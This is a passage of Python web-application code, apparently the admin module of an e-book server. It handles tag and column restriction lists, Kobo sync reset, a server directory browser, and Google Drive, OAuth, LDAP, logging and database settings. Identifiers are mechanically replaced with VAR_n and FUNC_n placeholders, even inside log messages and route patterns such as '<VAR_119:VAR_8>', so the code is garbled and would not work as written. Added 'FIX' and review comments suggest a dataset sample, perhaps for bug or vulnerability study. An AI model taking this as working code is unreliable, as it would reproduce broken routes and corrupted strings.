            if isinstance(VAR_9, VAR_119):
                VAR_120 = ub.session.query(ub.User).filter(ub.User.id == VAR_119(VAR_9)).first()
            else:
                VAR_120 = VAR_62
            VAR_69 = VAR_120.list_allowed_tags()
            VAR_69[VAR_119(VAR_10['id'][1:])] = VAR_10['Element']
            VAR_120.allowed_tags = ','.join(VAR_69)
            ub.session_commit("Changed allowed VAR_40 of VAR_12 {} to {}".format(VAR_120.name, VAR_120.allowed_tags))
        if VAR_8 == 3:  # CColumn per VAR_12
            if isinstance(VAR_9, VAR_119):
                VAR_120 = ub.session.query(ub.User).filter(ub.User.id == VAR_119(VAR_9)).first()
            else:
                VAR_120 = VAR_62
            VAR_69 = VAR_120.list_allowed_column_values()
            VAR_69[VAR_119(VAR_10['id'][1:])] = VAR_10['Element']
            VAR_120.allowed_column_value = ','.join(VAR_69)
            ub.session_commit("Changed allowed columns of VAR_12 {} to {}".format(VAR_120.name, VAR_120.allowed_column_value))
    if VAR_10['id'].startswith('d'):
        if VAR_8 == 0:  # Tags as template
            VAR_69 = config.list_denied_tags()
            VAR_69[VAR_119(VAR_10['id'][1:])] = VAR_10['Element']
            config.config_denied_tags = ','.join(VAR_69)
            config.save()
        if VAR_8 == 1:  # CustomC
            VAR_69 = config.list_denied_column_values()
            VAR_69[VAR_119(VAR_10['id'][1:])] = VAR_10['Element']
            config.config_denied_column_value = ','.join(VAR_69)
            config.save()
        if VAR_8 == 2:  # Tags per VAR_12
            if isinstance(VAR_9, VAR_119):
                VAR_120 = ub.session.query(ub.User).filter(ub.User.id == VAR_119(VAR_9)).first()
            else:
                VAR_120 = VAR_62
            VAR_69 = VAR_120.list_denied_tags()
            VAR_69[VAR_119(VAR_10['id'][1:])] = VAR_10['Element']
            VAR_120.denied_tags = ','.join(VAR_69)
            ub.session_commit("Changed denied VAR_40 of VAR_12 {} to {}".format(VAR_120.name, VAR_120.denied_tags))
        if VAR_8 == 3:  # CColumn per VAR_12
            if isinstance(VAR_9, VAR_119):
                VAR_120 = ub.session.query(ub.User).filter(ub.User.id == VAR_119(VAR_9)).first()
            else:
                VAR_120 = VAR_62
            VAR_69 = VAR_120.list_denied_column_values()
            VAR_69[VAR_119(VAR_10['id'][1:])] = VAR_10['Element']
            VAR_120.denied_column_value = ','.join(VAR_69)
            ub.session_commit("Changed denied columns of VAR_12 {} to {}".format(VAR_120.name, VAR_120.denied_column_value))
    return ""
def FUNC_27(VAR_10, VAR_11):
    """Append VAR_10['add_element'] to the comma-separated list produced by VAR_11().

    VAR_11 is a zero-argument callable returning the current list; [''] is
    treated as empty. Duplicates are not added. Returns the joined string.
    """
    VAR_69 = VAR_11()
    if VAR_69 == ['']:
        VAR_69 = []
    if not VAR_10['add_element'] in VAR_69:
        # FIX: previously appended to an undefined name "elementlist"
        VAR_69 += [VAR_10['add_element']]
    return ','.join(VAR_69)
def FUNC_28(VAR_10, VAR_11):
    """Remove VAR_10['Element'] from the comma-separated list produced by VAR_11().

    Missing elements are ignored. Returns the joined remainder.
    """
    VAR_69 = VAR_11()
    if VAR_10['Element'] in VAR_69:
        # FIX: previously called .remove() on an undefined name "elementlist"
        VAR_69.remove(VAR_10['Element'])
    return ','.join(VAR_69)
def FUNC_29(VAR_12, VAR_13, VAR_14, VAR_15):
    """Recompute a user's comma-separated restriction attribute.

    VAR_12: user object; VAR_13: "add" or "remove"; VAR_14: attribute name
    (a *tags* field, or a custom-column restriction field otherwise);
    VAR_15: ids of the tags / column values involved. Returns the new
    comma-joined value; raises on unknown tags or an invalid action.
    """
    if "tags" in VAR_14:
        VAR_40 = calibre_db.session.query(db.Tags).filter(db.Tags.id.in_(VAR_15)).all()
        if not VAR_40:
            raise Exception(_("Tag not found"))
        VAR_102 = [VAR_17.name for VAR_17 in VAR_40]
    else:
        VAR_40 = calibre_db.session.query(db.cc_classes[config.config_restricted_column])\
            .filter(db.cc_classes[config.config_restricted_column].id.in_(VAR_15)).all()
        VAR_102 = [VAR_17.value for VAR_17 in VAR_40]
    # current attribute value as a list; an empty string means no entries
    VAR_70 = VAR_12.__dict__[VAR_14].split(",") if len(VAR_12.__dict__[VAR_14]) else []
    if VAR_13 == "remove":
        VAR_70 = [VAR_17 for VAR_17 in VAR_70 if VAR_17 not in VAR_102]
    elif VAR_13 == "add":
        VAR_70.extend(VAR_17 for VAR_17 in VAR_102 if VAR_17 not in VAR_70)
    else:
        raise Exception(_("Invalid Action"))
    return ",".join(VAR_70)
@VAR_2.route("/ajax/addrestriction/<VAR_119:VAR_8>", methods=['POST'])
@login_required
@FUNC_0
def FUNC_30(VAR_8):
    """Template-level variant of FUNC_31 (no specific user; user id 0)."""
    return FUNC_31(VAR_8, 0)
@VAR_2.route("/ajax/addrestriction/<VAR_119:VAR_8>/<VAR_119:VAR_9>", methods=['POST'])
@login_required
@FUNC_0
def FUNC_31(VAR_8, VAR_9):
    """Add an entry to an allow/deny restriction list.

    VAR_8: 0 = template tags, 1 = template custom column, 2 = per-user tags,
    3 = per-user custom column. The form carries 'submit_allow' or
    'submit_deny' plus the element to add.
    """
    VAR_10 = request.form.to_dict()
    if VAR_8 == 0:  # Tags as template
        if 'submit_allow' in VAR_10:
            config.config_allowed_tags = FUNC_27(VAR_10, config.list_allowed_tags)
            config.save()
        elif 'submit_deny' in VAR_10:
            config.config_denied_tags = FUNC_27(VAR_10, config.list_denied_tags)
            config.save()
    if VAR_8 == 1:  # CCustom as template
        # FIX: allowed/denied list getters were swapped (allowed additions
        # were appended to the denied list and vice versa), inconsistent
        # with the parallel tag branch above
        if 'submit_allow' in VAR_10:
            config.config_allowed_column_value = FUNC_27(VAR_10, config.list_allowed_column_values)
            config.save()
        elif 'submit_deny' in VAR_10:
            config.config_denied_column_value = FUNC_27(VAR_10, config.list_denied_column_values)
            config.save()
    if VAR_8 == 2:  # Tags per VAR_12
        if isinstance(VAR_9, VAR_119):
            VAR_120 = ub.session.query(ub.User).filter(ub.User.id == VAR_119(VAR_9)).first()
        else:
            VAR_120 = VAR_62
        if 'submit_allow' in VAR_10:
            VAR_120.allowed_tags = FUNC_27(VAR_10, VAR_120.list_allowed_tags)
            ub.session_commit("Changed allowed VAR_40 of VAR_12 {} to {}".format(VAR_120.name, VAR_120.list_allowed_tags()))
        elif 'submit_deny' in VAR_10:
            VAR_120.denied_tags = FUNC_27(VAR_10, VAR_120.list_denied_tags)
            ub.session_commit("Changed denied VAR_40 of VAR_12 {} to {}".format(VAR_120.name, VAR_120.list_denied_tags()))
    if VAR_8 == 3:  # CustomC per VAR_12
        if isinstance(VAR_9, VAR_119):
            VAR_120 = ub.session.query(ub.User).filter(ub.User.id == VAR_119(VAR_9)).first()
        else:
            VAR_120 = VAR_62
        if 'submit_allow' in VAR_10:
            VAR_120.allowed_column_value = FUNC_27(VAR_10, VAR_120.list_allowed_column_values)
            ub.session_commit("Changed allowed columns of VAR_12 {} to {}".format(VAR_120.name,
                                                                                 VAR_120.list_allowed_column_values()))
        elif 'submit_deny' in VAR_10:
            VAR_120.denied_column_value = FUNC_27(VAR_10, VAR_120.list_denied_column_values)
            ub.session_commit("Changed denied columns of VAR_12 {} to {}".format(VAR_120.name,
                                                                                VAR_120.list_denied_column_values()))
    return ""
@VAR_2.route("/ajax/deleterestriction/<VAR_119:VAR_8>", methods=['POST'])
@login_required
@FUNC_0
def FUNC_32(VAR_8):
    """Template-level variant of FUNC_33 (no specific user; user id 0)."""
    return FUNC_33(VAR_8, 0)
@VAR_2.route("/ajax/deleterestriction/<VAR_119:VAR_8>/<VAR_119:VAR_9>", methods=['POST'])
@login_required
@FUNC_0
def FUNC_33(VAR_8, VAR_9):
    """Delete an entry from an allow/deny restriction list.

    VAR_8: 0 = template tags, 1 = template custom column, 2 = per-user tags,
    3 = per-user custom column. The form 'id' prefix selects the list:
    'a' = allow, 'd' = deny.
    """
    VAR_10 = request.form.to_dict()
    if VAR_8 == 0:  # Tags as template
        if VAR_10['id'].startswith('a'):
            config.config_allowed_tags = FUNC_28(VAR_10, config.list_allowed_tags)
            config.save()
        elif VAR_10['id'].startswith('d'):
            config.config_denied_tags = FUNC_28(VAR_10, config.list_denied_tags)
            config.save()
    elif VAR_8 == 1:  # CustomC as template
        if VAR_10['id'].startswith('a'):
            config.config_allowed_column_value = FUNC_28(VAR_10, config.list_allowed_column_values)
            config.save()
        elif VAR_10['id'].startswith('d'):
            config.config_denied_column_value = FUNC_28(VAR_10, config.list_denied_column_values)
            config.save()
    elif VAR_8 == 2:  # Tags per VAR_12
        if isinstance(VAR_9, VAR_119):
            VAR_120 = ub.session.query(ub.User).filter(ub.User.id == VAR_119(VAR_9)).first()
        else:
            VAR_120 = VAR_62
        if VAR_10['id'].startswith('a'):
            VAR_120.allowed_tags = FUNC_28(VAR_10, VAR_120.list_allowed_tags)
            ub.session_commit("Deleted allowed VAR_40 of VAR_12 {}: {}".format(VAR_120.name, VAR_120.list_allowed_tags))
        elif VAR_10['id'].startswith('d'):
            VAR_120.denied_tags = FUNC_28(VAR_10, VAR_120.list_denied_tags)
            # NOTE(review): logs list_allowed_tags here although denied tags changed
            ub.session_commit("Deleted denied VAR_40 of VAR_12 {}: {}".format(VAR_120.name, VAR_120.list_allowed_tags))
    elif VAR_8 == 3:  # Columns per VAR_12
        if isinstance(VAR_9, VAR_119):
            VAR_120 = ub.session.query(ub.User).filter(ub.User.id == VAR_119(VAR_9)).first()
        else:
            VAR_120 = VAR_62
        if VAR_10['id'].startswith('a'):
            VAR_120.allowed_column_value = FUNC_28(VAR_10, VAR_120.list_allowed_column_values)
            ub.session_commit("Deleted allowed columns of VAR_12 {}: {}".format(VAR_120.name,
                                                                               VAR_120.list_allowed_column_values))
        elif VAR_10['id'].startswith('d'):
            VAR_120.denied_column_value = FUNC_28(VAR_10, VAR_120.list_denied_column_values)
            ub.session_commit("Deleted denied columns of VAR_12 {}: {}".format(VAR_120.name,
                                                                              VAR_120.list_denied_column_values))
    return ""
@VAR_2.route("/ajax/listrestriction/<VAR_119:VAR_8>", defaults={"user_id": 0})
@VAR_2.route("/ajax/listrestriction/<VAR_119:VAR_8>/<VAR_119:VAR_9>")
@login_required
@FUNC_0
def FUNC_34(VAR_8, VAR_9):
    """Return the allow and deny entries of the selected restriction list as JSON.

    Each entry carries its value, a localized type label and an id prefixed
    'a' (allow) or 'd' (deny) plus its index in the list.
    NOTE(review): the defaults dict uses key "user_id" while the parameter
    is named VAR_9 — confirm the route default actually binds.
    """
    if VAR_8 == 0:  # Tags as template
        VAR_103 = [{'Element': VAR_17, 'type':_('Deny'), 'id': 'd'+str(i) }
                   for i,VAR_17 in enumerate(config.list_denied_tags()) if VAR_17 != '']
        VAR_7 = [{'Element': VAR_17, 'type': _('Allow'), 'id': 'a'+str(i)}
                 for i, VAR_17 in enumerate(config.list_allowed_tags()) if VAR_17 != '']
        VAR_67 = VAR_103 + VAR_7
    elif VAR_8 == 1:  # CustomC as template
        VAR_103 = [{'Element': VAR_17, 'type': _('Deny'), 'id': 'd'+str(i)}
                   for i, VAR_17 in enumerate(config.list_denied_column_values()) if VAR_17 != '']
        VAR_7 = [{'Element': VAR_17, 'type': _('Allow'), 'id': 'a'+str(i)}
                 for i, VAR_17 in enumerate(config.list_allowed_column_values()) if VAR_17 != '']
        VAR_67 = VAR_103 + VAR_7
    elif VAR_8 == 2:  # Tags per VAR_12
        if isinstance(VAR_9, VAR_119):
            VAR_120 = ub.session.query(ub.User).filter(ub.User.id == VAR_9).first()
        else:
            VAR_120 = VAR_62
        VAR_103 = [{'Element': VAR_17, 'type': _('Deny'), 'id': 'd'+str(i)}
                   for i, VAR_17 in enumerate(VAR_120.list_denied_tags()) if VAR_17 != '']
        VAR_7 = [{'Element': VAR_17, 'type': _('Allow'), 'id': 'a'+str(i)}
                 for i, VAR_17 in enumerate(VAR_120.list_allowed_tags()) if VAR_17 != '']
        VAR_67 = VAR_103 + VAR_7
    elif VAR_8 == 3:  # CustomC per VAR_12
        if isinstance(VAR_9, VAR_119):
            VAR_120 = ub.session.query(ub.User).filter(ub.User.id == VAR_9).first()
        else:
            VAR_120 = VAR_62
        VAR_103 = [{'Element': VAR_17, 'type': _('Deny'), 'id': 'd'+str(i)}
                   for i, VAR_17 in enumerate(VAR_120.list_denied_column_values()) if VAR_17 != '']
        VAR_7 = [{'Element': VAR_17, 'type': _('Allow'), 'id': 'a'+str(i)}
                 for i, VAR_17 in enumerate(VAR_120.list_allowed_column_values()) if VAR_17 != '']
        VAR_67 = VAR_103 + VAR_7
    else:
        VAR_67 = ""
    VAR_68 = json.dumps(VAR_67)
    VAR_52 = make_response(VAR_68)
    VAR_52.headers["Content-Type"] = "application/json; charset=utf-8"
    return VAR_52
@VAR_2.route("/ajax/fullsync", methods=["POST"])
@login_required
def FUNC_35():
    """Drop the current user's Kobo sync bookkeeping to force a full resync."""
    VAR_55 = ub.session.query(ub.KoboSyncedBooks).filter(VAR_62.id == ub.KoboSyncedBooks.user_id).delete()
    VAR_71 = _("{} sync entries deleted").format(VAR_55)
    ub.session_commit(VAR_71)
    return Response(json.dumps([{"type": "success", "message": VAR_71}]), mimetype='application/json')
@VAR_2.route("/ajax/FUNC_37/")
@login_required
@FUNC_0
def FUNC_36():
    """Admin-only AJAX wrapper around the filesystem path chooser."""
    return FUNC_37()
def FUNC_37():
    """Return a JSON directory listing for the server-side path chooser.

    Query args: 'path' (start file/dir), 'folder' ("true" => list only
    directories), 'filter' (exact file name to keep). The reply carries the
    current dir, its parent, the sorted entries, the previously selected
    file and whether the given path was absolute.
    """
    VAR_72 = "folder"
    VAR_73 = request.args.get('folder', False) == "true"
    VAR_74 = request.args.get('filter', "")
    VAR_75 = os.path.normpath(request.args.get('path', ""))
    if os.path.isfile(VAR_75):
        VAR_104 = VAR_75
        # FIX: browse the file's containing directory; the dirname result
        # was previously assigned to an unused name, leaving VAR_75
        # pointing at the file itself
        VAR_75 = os.path.dirname(VAR_75)
    else:
        VAR_104 = ""
    VAR_76 = False
    if os.path.isdir(VAR_75):
        VAR_77 = os.path.realpath(VAR_75)
        VAR_76 = True
    else:
        VAR_77 = os.getcwd()
    VAR_77 = os.path.normpath(os.path.realpath(VAR_77))
    VAR_78 = os.path.dirname(VAR_77)
    if not VAR_76:
        # relative browsing: keep paths relative to the working directory
        if os.path.realpath(VAR_77) == os.path.realpath("/"):
            VAR_77 = os.path.relpath(VAR_77)
        else:
            VAR_77 = os.path.relpath(VAR_77) + os.path.sep
        VAR_78 = os.path.relpath(VAR_78) + os.path.sep
    if os.path.realpath(VAR_77) == os.path.realpath("/"):
        VAR_78 = ""
    try:
        VAR_105 = os.listdir(VAR_77)
    except Exception:
        VAR_105 = []
    VAR_79 = []
    for VAR_3 in VAR_105:
        try:
            VAR_121 = {"name": VAR_3, "fullpath": os.path.join(VAR_77, VAR_3)}
            VAR_121["sort"] = VAR_121["fullpath"].lower()
        except Exception:
            continue
        if os.path.isfile(os.path.join(VAR_77, VAR_3)):
            if VAR_73:
                continue
            if VAR_74 != "" and VAR_74 != VAR_3:
                continue
            VAR_121["type"] = "file"
            VAR_121["size"] = os.path.getsize(os.path.join(VAR_77, VAR_3))
            # scale the byte count to a human-readable unit
            VAR_122 = 0
            while (VAR_121["size"] >> 10) > 0.3:
                VAR_122 += 1
                VAR_121["size"] >>= 10
            VAR_123 = ("", "K", "M", "G", "T")
            VAR_121["size"] = str(VAR_121["size"]) + " " + VAR_123[VAR_122] + "Byte"
        else:
            VAR_121["type"] = "dir"
            VAR_121["size"] = ""
        VAR_79.append(VAR_121)
    VAR_79 = sorted(VAR_79, key=operator.itemgetter("type", "sort"))
    VAR_80 = {
        "cwd": VAR_77,
        "files": VAR_79,
        "parentdir": VAR_78,
        "type": VAR_72,
        "oldfile": VAR_104,
        "absolute": VAR_76,
    }
    return json.dumps(VAR_80)
def FUNC_38(VAR_16, VAR_17, VAR_18=VAR_119):
    """Store form value VAR_17 from dict VAR_16 in config, converted by VAR_18 (default: int)."""
    return config.set_from_dictionary(VAR_16, VAR_17, VAR_18)
def FUNC_39(VAR_16, VAR_17):
    """Store checkbox VAR_17 from dict VAR_16 as a boolean (checked == "on")."""
    def _checkbox_to_bool(raw):
        return raw == "on"
    return config.set_from_dictionary(VAR_16, VAR_17, _checkbox_to_bool, False)
def FUNC_40(VAR_16, VAR_17):
    """Store checkbox VAR_17 from dict VAR_16 as integer 1 (checked) or 0."""
    def _checkbox_to_int(raw):
        return 1 if (raw == "on") else 0
    return config.set_from_dictionary(VAR_16, VAR_17, _checkbox_to_int, 0)
def FUNC_41(VAR_16, VAR_17):
    """Store string VAR_17 from dict VAR_16, stripped of surrounding whitespace."""
    def _strip_if_set(raw):
        return raw.strip() if raw else raw
    return config.set_from_dictionary(VAR_16, VAR_17, _strip_if_set)
def FUNC_42(VAR_16):
    """Apply the Google-Drive related settings from the config form VAR_16.

    Returns the gdrive error text (or None). Disables gdrive when
    settings.yaml is missing; writes the client secrets on first enable.
    """
    VAR_21 = None
    if VAR_16.get("config_use_google_drive"):
        VAR_106 = {}
        if not os.path.isfile(gdriveutils.SETTINGS_YAML):
            config.config_use_google_drive = False
        if gdrive_support:
            # fills VAR_106 with the parsed client secrets as a side effect
            VAR_21 = gdriveutils.get_error_text(VAR_106)
            if "config_use_google_drive" in VAR_16 and not config.config_use_google_drive and not VAR_21:
                with open(gdriveutils.CLIENT_SECRETS, 'r') as settings:
                    VAR_106 = json.load(settings)['web']
                if not VAR_106:
                    return FUNC_50(_('client_secrets.json Is Not Configured For Web Application'))
                gdriveutils.update_settings(
                    VAR_106['client_id'],
                    VAR_106['client_secret'],
                    VAR_106['redirect_uris'][0]
                )
    # gdrive stays enabled only when requested and error-free
    VAR_81 = (not VAR_21) and ("config_use_google_drive" in VAR_16)
    if config.config_use_google_drive and not VAR_81:
        config.config_google_drive_watch_changes_response = {}
    config.config_use_google_drive = VAR_81
    if FUNC_41(VAR_16, "config_google_drive_folder"):
        # watched folder changed: local metadata copy is stale
        gdriveutils.deleteDatabaseOnChange()
    return VAR_21
def FUNC_43(VAR_16):
    """Apply OAuth provider credentials from the config form VAR_16.

    Iterates the configured providers (VAR_96, module-level — presumably the
    oauth blueprint list; confirm), updates id/secret and active flags, and
    returns True when a restart is required (credentials changed).
    """
    VAR_82 = 0          # count of providers with complete credentials
    VAR_83 = False      # reboot required
    for VAR_10 in VAR_96:
        if VAR_16["config_" + str(VAR_10['id']) + "_oauth_client_id"] != VAR_10['oauth_client_id'] \
                or VAR_16["config_" + str(VAR_10['id']) + "_oauth_client_secret"] != VAR_10['oauth_client_secret']:
            VAR_83 = True
            VAR_10['oauth_client_id'] = VAR_16["config_" + str(VAR_10['id']) + "_oauth_client_id"]
            VAR_10['oauth_client_secret'] = VAR_16["config_" + str(VAR_10['id']) + "_oauth_client_secret"]
        if VAR_16["config_" + str(VAR_10['id']) + "_oauth_client_id"] \
                and VAR_16["config_" + str(VAR_10['id']) + "_oauth_client_secret"]:
            VAR_82 += 1
            VAR_10["active"] = 1
        else:
            VAR_10["active"] = 0
        ub.session.query(ub.OAuthProvider).filter(ub.OAuthProvider.id == VAR_10['id']).update(
            {"oauth_client_id": VAR_16["config_" + str(VAR_10['id']) + "_oauth_client_id"],
             "oauth_client_secret": VAR_16["config_" + str(VAR_10['id']) + "_oauth_client_secret"],
             "active": VAR_10["active"]})
    return VAR_83
def FUNC_44(VAR_16):
    """Apply log settings from the config form VAR_16.

    Returns (reboot_required, error_response_or_None); an invalid logfile
    path aborts with an error response from FUNC_50.
    """
    VAR_83 = False
    VAR_83 |= FUNC_38(VAR_16, "config_log_level")
    VAR_83 |= FUNC_41(VAR_16, "config_logfile")
    if not logger.is_valid_logfile(config.config_logfile):
        return VAR_83, \
            FUNC_50(_('Logfile Location is not Valid, Please Enter Correct Path'))
    VAR_83 |= FUNC_40(VAR_16, "config_access_log")
    VAR_83 |= FUNC_41(VAR_16, "config_access_logfile")
    if not logger.is_valid_logfile(config.config_access_logfile):
        return VAR_83, \
            FUNC_50(_('Access Logfile Location is not Valid, Please Enter Correct Path'))
    return VAR_83, None
def FUNC_45(VAR_16):
    """Apply and validate LDAP settings from the config form VAR_16.

    Returns (reboot_required, error_response_or_None). Validation failures
    return an error response from FUNC_50 without saving further changes.
    """
    VAR_83 = False
    VAR_83 |= FUNC_41(VAR_16, "config_ldap_provider_url")
    VAR_83 |= FUNC_38(VAR_16, "config_ldap_port")
    VAR_83 |= FUNC_38(VAR_16, "config_ldap_authentication")
    VAR_83 |= FUNC_41(VAR_16, "config_ldap_dn")
    VAR_83 |= FUNC_41(VAR_16, "config_ldap_serv_username")
    VAR_83 |= FUNC_41(VAR_16, "config_ldap_user_object")
    VAR_83 |= FUNC_41(VAR_16, "config_ldap_group_object_filter")
    VAR_83 |= FUNC_41(VAR_16, "config_ldap_group_members_field")
    VAR_83 |= FUNC_41(VAR_16, "config_ldap_member_user_object")
    VAR_83 |= FUNC_39(VAR_16, "config_ldap_openldap")
    VAR_83 |= FUNC_38(VAR_16, "config_ldap_encryption")
    VAR_83 |= FUNC_41(VAR_16, "config_ldap_cacert_path")
    VAR_83 |= FUNC_41(VAR_16, "config_ldap_cert_path")
    VAR_83 |= FUNC_41(VAR_16, "config_ldap_key_path")
    FUNC_41(VAR_16, "config_ldap_group_name")
    if VAR_16.get("config_ldap_serv_password", "") != "":
        # only overwrite the stored password when a new one was entered
        VAR_83 |= 1
        config.set_from_dictionary(VAR_16, "config_ldap_serv_password", base64.b64encode, encode='UTF-8')
    config.save()
    if not config.config_ldap_provider_url \
            or not config.config_ldap_port \
            or not config.config_ldap_dn \
            or not config.config_ldap_user_object:
        return VAR_83, FUNC_50(_('Please Enter a LDAP Provider, '
                                 'Port, DN and User Object Identifier'))
    if config.config_ldap_authentication > constants.LDAP_AUTH_ANONYMOUS:
        if config.config_ldap_authentication > constants.LDAP_AUTH_UNAUTHENTICATE:
            if not config.config_ldap_serv_username or not bool(config.config_ldap_serv_password):
                return VAR_83, FUNC_50(_('Please Enter a LDAP Service Account and Password'))
        else:
            if not config.config_ldap_serv_username:
                return VAR_83, FUNC_50(_('Please Enter a LDAP Service Account'))
    if config.config_ldap_group_object_filter:
        # the group filter must embed exactly one %s placeholder
        if config.config_ldap_group_object_filter.count("%s") != 1:
            return VAR_83, \
                FUNC_50(_('LDAP Group Object Filter Needs to Have One "%s" Format Identifier'))
        if config.config_ldap_group_object_filter.count("(") != config.config_ldap_group_object_filter.count(")"):
            return VAR_83, FUNC_50(_('LDAP Group Object Filter Has Unmatched Parenthesis'))
    if config.config_ldap_user_object.count("%s") != 1:
        return VAR_83, \
            FUNC_50(_('LDAP User Object Filter needs to Have One "%s" Format Identifier'))
    if config.config_ldap_user_object.count("(") != config.config_ldap_user_object.count(")"):
        return VAR_83, FUNC_50(_('LDAP User Object Filter Has Unmatched Parenthesis'))
    if VAR_16.get("ldap_import_user_filter") == '0':
        config.config_ldap_member_user_object = ""
    else:
        if config.config_ldap_member_user_object.count("%s") != 1:
            return VAR_83, \
                FUNC_50(_('LDAP Member User Filter needs to Have One "%s" Format Identifier'))
        if config.config_ldap_member_user_object.count("(") != config.config_ldap_member_user_object.count(")"):
            return VAR_83, FUNC_50(_('LDAP Member User Filter Has Unmatched Parenthesis'))
    if config.config_ldap_cacert_path or config.config_ldap_cert_path or config.config_ldap_key_path:
        if not (os.path.isfile(config.config_ldap_cacert_path) and
                os.path.isfile(config.config_ldap_cert_path) and
                os.path.isfile(config.config_ldap_key_path)):
            return VAR_83, \
                FUNC_50(_('LDAP CACertificate, Certificate or Key Location is not Valid, '
                          'Please Enter Correct Path'))
    return VAR_83, None
@VAR_2.route("/ajax/simulatedbchange", methods=['POST'])
@login_required
@FUNC_0
def FUNC_46():
    """Dry-run a Calibre DB location change; report change/validity as JSON."""
    db_change, db_valid = FUNC_47()
    payload = {"change": db_change, "valid": db_valid}
    return Response(json.dumps(payload), mimetype='application/json')
def FUNC_47():
    """Compare the posted Calibre dir against the current configuration.

    Returns (changed, valid): changed is truthy when a directory is already
    configured and differs from the posted one; valid is the result of
    calibre_db.check_valid_db() on the posted directory.
    """
    posted = request.form.to_dict()
    cleaned = {}
    # accept paths that include the trailing metadata.db file name
    cleaned['config_calibre_dir'] = re.sub(r'[\\/]metadata\.db$',
                                           '',
                                           posted['config_calibre_dir'],
                                           flags=re.IGNORECASE).strip()
    db_change = config.config_calibre_dir != cleaned["config_calibre_dir"] and config.config_calibre_dir
    db_valid = calibre_db.check_valid_db(cleaned["config_calibre_dir"], ub.app_DB_path)
    return db_change, db_valid
def FUNC_48():
    """Apply a Calibre database location change from the posted config form.

    Re-initializes the library DB when the location changed or was invalid,
    wipes per-library bookkeeping (downloads, shelves, read state, Kobo
    sync) and returns the rendered result page via FUNC_51.
    """
    VAR_84 = False
    VAR_16 = request.form.to_dict()
    VAR_21 = None
    # accept a path that includes the trailing metadata.db file name
    VAR_16['config_calibre_dir'] = re.sub(r'[\\/]metadata\.db$',
                                          '',
                                          VAR_16['config_calibre_dir'],
                                          flags=re.IGNORECASE)
    try:
        VAR_84, VAR_85 = FUNC_47()
        VAR_21 = FUNC_42(VAR_16)
    except (OperationalError, InvalidRequestError):
        ub.session.rollback()
        VAR_0.error("Settings DB is not Writeable")
        FUNC_51(_("Settings DB is not Writeable"), VAR_21)
    try:
        VAR_107 = os.path.join(VAR_16['config_calibre_dir'], "metadata.db")
        if config.config_use_google_drive and is_gdrive_ready() and not os.path.exists(VAR_107):
            # fetch the library metadata from Google Drive on first use
            gdriveutils.downloadFile(None, "metadata.db", VAR_107)
            VAR_84 = True
    except Exception as ex:
        return FUNC_51('{}'.format(ex), VAR_21)
    if VAR_84 or not VAR_85 or not config.db_configured:
        if not calibre_db.setup_db(VAR_16['config_calibre_dir'], ub.app_DB_path):
            return FUNC_51(_('DB Location is not Valid, Please Enter Correct Path'),
                           VAR_21)
        # library changed: all per-library user state is stale
        ub.session.query(ub.Downloads).delete()
        ub.session.query(ub.ArchivedBook).delete()
        ub.session.query(ub.ReadBook).delete()
        ub.session.query(ub.BookShelf).delete()
        ub.session.query(ub.Bookmark).delete()
        ub.session.query(ub.KoboReadingState).delete()
        ub.session.query(ub.KoboStatistics).delete()
        ub.session.query(ub.KoboSyncedBooks).delete()
        ub.session_commit()
    FUNC_41(VAR_16, "config_calibre_dir")
    calibre_db.update_config(config)
    if not os.access(os.path.join(config.config_calibre_dir, "metadata.db"), os.W_OK):
        flash(_(u"DB is not Writeable"), category="warning")
    config.save()
    return FUNC_51(None, VAR_21)
def FUNC_49():
    """Apply the main server configuration form.

    Validates sub-sections via the dedicated helpers (LDAP, OAuth, logging),
    saves the config and stops the web server when a restart is required.
    Returns a JSON result response from FUNC_50.
    """
    VAR_83 = False  # reboot required
    VAR_16 = request.form.to_dict()
    try:
        VAR_83 |= FUNC_38(VAR_16, "config_port")
        VAR_83 |= FUNC_41(VAR_16, "config_trustedhosts")
        VAR_83 |= FUNC_41(VAR_16, "config_keyfile")
        if config.config_keyfile and not os.path.isfile(config.config_keyfile):
            return FUNC_50(_('Keyfile Location is not Valid, Please Enter Correct Path'))
        VAR_83 |= FUNC_41(VAR_16, "config_certfile")
        if config.config_certfile and not os.path.isfile(config.config_certfile):
            return FUNC_50(_('Certfile Location is not Valid, Please Enter Correct Path'))
        FUNC_40(VAR_16, "config_uploading")
        FUNC_40(VAR_16, "config_unicode_filename")
        # disabling anonymous browsing under LDAP login requires a restart
        VAR_83 |= (FUNC_40(VAR_16, "config_anonbrowse")
                   and config.config_login_type == constants.LOGIN_LDAP)
        FUNC_40(VAR_16, "config_public_reg")
        FUNC_40(VAR_16, "config_register_email")
        VAR_83 |= FUNC_40(VAR_16, "config_kobo_sync")
        FUNC_38(VAR_16, "config_external_port")
        FUNC_40(VAR_16, "config_kobo_proxy")
        if "config_upload_formats" in VAR_16:
            # normalize to a unique, lower-case, comma-separated list
            VAR_16["config_upload_formats"] = ','.join(
                helper.uniq([VAR_17.lstrip().rstrip().lower() for VAR_17 in VAR_16["config_upload_formats"].split(',')]))
            FUNC_41(VAR_16, "config_upload_formats")
            constants.EXTENSIONS_UPLOAD = config.config_upload_formats.split(',')
        FUNC_41(VAR_16, "config_calibre")
        FUNC_41(VAR_16, "config_converterpath")
        FUNC_41(VAR_16, "config_kepubifypath")
        VAR_83 |= FUNC_38(VAR_16, "config_login_type")
        if config.config_login_type == constants.LOGIN_LDAP:
            VAR_20, VAR_71 = FUNC_45(VAR_16)
            if VAR_71:
                return VAR_71
            VAR_83 |= VAR_20
        FUNC_39(VAR_16, "config_remote_login")
        if not config.config_remote_login:
            # remote login disabled: purge pending auth tokens
            ub.session.query(ub.RemoteAuthToken).filter(ub.RemoteAuthToken.token_type == 0).delete()
        FUNC_39(VAR_16, "config_use_goodreads")
        FUNC_41(VAR_16, "config_goodreads_api_key")
        FUNC_41(VAR_16, "config_goodreads_api_secret")
        if services.goodreads_support:
            services.goodreads_support.connect(config.config_goodreads_api_key,
                                               config.config_goodreads_api_secret,
                                               config.config_use_goodreads)
        FUNC_38(VAR_16, "config_updatechannel")
        FUNC_39(VAR_16, "config_allow_reverse_proxy_header_login")
        FUNC_41(VAR_16, "config_reverse_proxy_login_header_name")
        if config.config_login_type == constants.LOGIN_OAUTH:
            VAR_83 |= FUNC_43(VAR_16)
        VAR_20, VAR_71 = FUNC_44(VAR_16)
        if VAR_71:
            return VAR_71
        VAR_83 |= VAR_20
        FUNC_41(VAR_16, "config_rarfile_location")
        if "config_rarfile_location" in VAR_16:
            VAR_124 = helper.check_unrar(config.config_rarfile_location)
            if VAR_124:
                return FUNC_50(VAR_124)
    except (OperationalError, InvalidRequestError):
        ub.session.rollback()
        VAR_0.error("Settings DB is not Writeable")
